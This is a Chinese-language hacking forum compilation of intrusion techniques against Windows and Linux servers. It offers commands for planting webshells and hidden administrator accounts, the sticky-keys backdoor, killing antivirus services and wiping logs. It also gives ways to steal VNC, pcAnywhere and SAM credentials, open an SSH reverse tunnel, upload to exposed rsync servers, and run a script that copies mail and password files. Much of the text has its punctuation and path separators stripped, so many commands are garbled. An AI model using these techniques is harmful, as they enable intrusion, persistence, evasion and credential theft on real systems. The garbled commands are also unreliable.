网络攻防---渗透技巧总结大全.doc

网络攻防-渗透技巧总结大全（最新版本）本着共享之精神，方便各位黑阔童鞋，发表此文，希望抛砖引玉，童鞋们踊跃发言。使之更加完善，在交流中进步，形成良好的互动旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11)=wscript.exe) ThenMsgbox Space(12) & IIS Virtual Web Viewer & Space(12) & Chr(13) & Space(9) & Usage:Cscript vWeb.vbs,4096,Lilo WScript.QuitEnd IfSet ObjService=GetObject(IIS:/LocalHost/W3SVC)For Each obj3w In objservice If IsNumeric(obj3w.Name) Then Set OService=GetObject(IIS:/LocalHost/W3SVC/ & obj3w.Name) Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT) If Err 0 Then WScript.Quit (1) WScript.Echo Chr(10) & & OService.ServerComment & For Each Binds In OService.ServerBindings Web = & Replace(Binds,:, ) & WScript.Echo Replace(Split(Replace(Web, ,),)(2),) Next WScript.Echo Path : & VDirObj.Path End IfNext复制代码3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）4、得到目标站目录，不能直接跨的。通过echo X:目标目录X.asp 或者copy 脚本文件 X:目标目录X.asp 像目标目录写入webshell。或者还可以试试type命令.WordPress的平台，爆绝对路径的方法是：url/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang=1phpmyadmin/themes/darkblue_orange/layout.inc.php网站可能目录(注：一般是虚拟主机类）data/htdocs.网站/网站/CMD下操作VPN相关netsh ras set user administrator permit #允许administrator拨入该VPNnetsh ras set user administrator deny #禁止administrator拨入该VPNnetsh ras show user #查看哪些用户可以拨入VPNnetsh ras ip show config #查看VPN分配IP的方式netsh ras ip set addrassign method = pool #使用地址池的方式分配IPnetsh ras ip add range from = to = 54 #地址池的范围是从到54命令行下添加SQL用户的方法需要有管理员权限,在命令下先建立一个c:test.qry文件,内容如下:exec master.dbo.sp_addlogin test,123EXEC sp_addsrvrolemember test, sysadmin然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:test.qry另类的加用户方法在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：js:var o=new ActiveXObject( Shell.Users );z=o.create(test) ;z.changePassword(123456,)z.setting(AccountType)=3;vbs:Set o=CreateObject( Shell.Users )Set z=o.create(test)z.changePassword 123456,z.setting(AccountType)=3cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）命令如下cacls c: /e /t /g everyone:F #c盘everyone权限cacls 目录 /d everyone #everyone不可读，包括admin以下配合PR更好3389相关a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）b、内网环境（LCX）c、终端服务器超出了最大允许连接XP 运行mstsc /admin2003 运行mstsc /console 杀软关闭（把杀软所在的文件的所有权限去掉）处理变态诺顿企业版：net stop Symantec AntiVirus /ynet stop Symantec AntiVirus Definition Watcher /ynet stop Symantec Event Manager /ynet stop System Event Notification /ynet stop Symantec Settings Manager /y卖咖啡：net stop McAfee McShield 5次SHIFT：copy %systemroot%system32sethc.exe %systemroot%system32dllcachesethc1.execopy %systemroot%system32cmd.exe %systemroot%system32dllcachesethc.exe /ycopy %systemroot%system32cmd.exe %systemroot%system32sethc.exe /y隐藏账号添加：1、net user admin$ 123456 /add&net localgroup administrators admin$ /add2、导出注册表SAM下用户的两个键值3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。4、利用Hacker Defender把相关用户注册表隐藏MSSQL扩展后门：USE master;EXEC sp_addextendedproc xp_helpsystem, xp_helpsystem.dll;GRANT exec On xp_helpsystem TO public;日志处理C:WINNTsystem32LogFilesMSFTPSVC1下有ex011120.log / ex011121.log / ex011124.log三个文件，直接删除 ex0111124.log不成功，“原文件.正在使用”当然可以直接删除ex011120.log / ex011121.log用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。当停止msftpsvc服务后可直接删除ex011124.logMSSQL查询分析器连接记录清除：MSSQL 2000位于注册表如下：HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers找到接接过的信息删除。MSSQL 2005是在C:Documents and SettingsApplication DataMicrosoftMicrosoft SQL Server90ToolsShellmru.dat防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）VNC提权方法利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解注册表位置：HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4passwordRadmin 默认端口是4899，HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter/默认密码注册表位置HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort /默认端口注册表位置然后用HASH版连接。如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 如果PCANYWHERE安装在D:program文件下下，那么PCANYWHERE的密码文件就保存在D:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere文件夹下。搜狗输入法的PinyinUp.exe是可读可写的直接替换即可-WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下来，看路径，访问 路径web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。7i24的web目录也是可写，权限为administrator。1433 SA点构建注入点。复制代码*liunx 相关*一.ldap渗透技巧1.cat /etc/nsswitch看看密码登录策略我们可以看到使用了file ldap模式2.less /etc/ldap.confbase ou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch -x -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h 有密码形式ldapsearch -x -W -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h 4.查找10条用户记录ldapsearch -h -x -z 10 -p 指定端口实战:1.cat /etc/nsswitch看看密码登录策略我们可以看到使用了file ldap模式2.less /etc/ldap.confbase ou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch -x -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h 有密码形式ldapsearch -x -W -D cn=administrator,cn=People,dc=unix-center,dc=net -b cn=administrator,cn=People,dc=unix-center,dc=net -h 4.查找10条用户记录ldapsearch -h -x -z 10 -p 指定端口渗透实战:1.返回所有的属性ldapsearch -h 3 -b dc=ruc,dc=edu,dc=cn -s sub objectclass=*version: 1dn: dc=ruc,dc=edu,dc=cndc: rucobjectClass: domaindn: uid=manager,dc=ruc,dc=edu,dc=cnuid: managerobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: managercn: managerdn: uid=superadmin,dc=ruc,dc=edu,dc=cnuid: superadminobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: superadmincn: superadmindn: uid=admin,dc=ruc,dc=edu,dc=cnuid: adminobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: admincn: admindn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cnuid: dcp_anonymousobjectClass: topobjectClass: personobjectClass: organizationalPersonobjectClass: inetOrgPersonsn: dcp_anonymouscn: dcp_anonymous2.查看基类bash-3.00# ldapsearch -h 3 -b dc=ruc,dc=edu,dc=cn -s base objectclass=* | moreversion: 1dn: dc=ruc,dc=edu,dc=cndc: rucobjectClass: domain3.查找bash-3.00# ldapsearch -h 3 -b -s base objectclass=*version: 1dn:objectClass: topnamingContexts: dc=ruc,dc=edu,dc=cnsupportedExtension: 2.16.840.1.1137supportedExtension: 2.16.840.1.1137supportedExtension: .4.1.4supportedExtension: ..5supportedExtension: 2.16.840.1.1137supportedExtension: 2.16.840.1.1137supportedExtension: 2.16.840.1.1137supportedExtension: 2.16.840.1.1137supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..supportedExtension: ..3supportedExtension: ..1supportedExtension: ..2supportedExtension: ..3supportedExtension: ..4supportedExtension: ..5supportedExtension: ..6supportedExtension: ..7supportedExtension: ..8supportedExtension: ..9supportedExtension: ..1supportedExtension: ..2supportedExtension: ..4supportedExtension: .4.1.1466.20037supportedExtension: .4.1.4supportedControl: 2.16.840.1.1137supportedControl: 2.16.840.1.1137supportedControl: 2.16.840.1.1137supportedControl: 2.16.840.1.1137supportedControl: 1.2.840.113573supportedControl: 2.16.840.1.1137supportedControl: 2.16.840.1.11376supportedControl: 2.16.840.1.11375supportedControl: 2.16.840.1.11377supportedControl: 2.16.840.1.11379supportedControl: ..supportedControl: ..supportedControl: ..supportedControl: ..supportedControl: ..supportedControl: 2.16.840.1.11374supportedControl: .4.1.1466.29539.12supportedControl: 2.16.840.1.11372supportedControl: 2.16.840.1.11378supportedControl: 2.16.840.1.11373supportedSASLMechanisms: EXTERNALsupportedSASLMechanisms: DIGEST-MD5supportedLDAPVersion: 2supportedLDAPVersion: 3vendorName: Sun Microsystems, Inc.vendorVersion: Sun-Java(tm)-System-Directory/6.2dataversion: 020090516011411netscapemdsuffix: cn=ldap:/dc=webA:389supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHAsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHAsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHAsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHAsupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD52. NFS渗透技巧showmount -e ip列举IP3.rsync渗透技巧1.查看rsync服务器上的列表rsync 210.51.X.X:financeimg_financeautoimg_autohtml_cmsimg_cmsent_cmsent_imgceshires_imgres_img_c2chipchip_c2ent_icmsgamesgamesimgmediamediaimgfashionres-fashionres-fotaobao-homeres-taobao-homehouseres-houseres-homeres-edures-entres-labsres-newsres-phtvres-mediahomeedunewsres-book看相应的下级目录(注意一定要在目录后面添加上/)rsync 210.51.X.X:htdocs_app/rsync 210.51.X.X:auto/rsync 210.51.X.X:edu/2.下载rsync服务器上的配置文件rsync -avz 210.51.X.X:htdocs_app/ /tmp/app/3.向上更新rsync文件(成功上传,不会覆盖)rsync -avz nothack.php 210.51.X.X:htdocs_app/warn//warn/nothack.txt四.squid渗透技巧nc -vv 80GET HTTP:/ / HTTP/1.0GET HTTP:/WWW.:22 / HTTP/1.0五.SSH端口转发ssh -C -f -N -g -R 44::22 cnbirdip六.joomla渗透小技巧确定版本index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47重新设置密码index.php?option=com_user&view=reset&layout=confirm七: Linux添加UID为0的root用户useradd -o -u 0 nothack八.freebsd本地提权argpjulius $ uname -rsi* freebsd 7.3-RELEASE GENERIC* argpjulius $ sysctl vfs.usermount* vfs.usermount: 1* argpjulius $ id* uid=1001(argp) gid=1001(argp) groups=1001(argp)* argpjulius $ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex* argpjulius $ ./nfs_mount_ex*calling nmount()（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。1、tar打包 tar -cvf /home/public_html/*.tar /home/public_html/-exclude= 排除文件*.gif 排除目录 /xx/xx/*alzip打包(韩国) alzip -a D:WEB d:web*.rar注：关于tar的打包方式,linux不以扩展名来决定文件类型。若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/-exclude= 排除文件*.gif 排除目录 /xx/xx/* 提权先执行systeminfotoken 漏洞补丁号 KB956572Churrasco kb952004命令行RAR打包rar a -k -r -s -m3 c:1.rar c:folder2、收集系统信息的脚本 for window：echo offecho #system info collectionsysteminfoverhostnamenet usernet localgroupnet localgroup administratorsnet user guestnet user administratorecho #at- with atq#echo schtask /queryechoecho #task-list#tasklist /svcechoecho #net-work infomationipconfig/allroute printarp -anetstat -anipconfig /displaydnsechoecho #service#sc query type= service state= allecho #file-#cd tree -Ffor linux：#!/bin/bashecho #geting sysinfo#echo #usage: ./getinfo.sh /tmp/sysinfo.txtecho #basic infomation#cat /proc/meminfoechocat /proc/cpuinfoechorpm -qa 2/dev/null#stole the mail.#cp -a /var/mail /tmp/getmail 2/dev/nullecho ur id is idecho #atq&crontab#atqcrontab -lecho #about var#setecho #about network#this is then point in pentest,but i am a new bird,so u need to add some in itcat /etc/hostshostnameipconfig -aarp -vecho #user#cat /etc/passwd|grep -i shecho #service#chkconfig -listfor i in oracle,mysql,tomcat,samba,apache,ftpcat /etc/passwd|grep -i $idonelocate passwd /tmp/password 2/dev/nullsleep 5locate password /tmp/password 2/dev/nullsleep 5locate conf /tmp/sysconfig 2dev/nullsleep 5locate config /tmp/sysconfig 2/dev/nullsleep 5#maybe can use tree /#echo #packing up#tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfigrm -rf /tmp/getmail /tmp/password /tmp/sysconfig3、ethash 不免杀怎么获取本机hash。首先导出注册表 regedit /e d:aa.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers （2000） reg export HKEY_LOCAL_MACHINESAMSAMDomainsAcc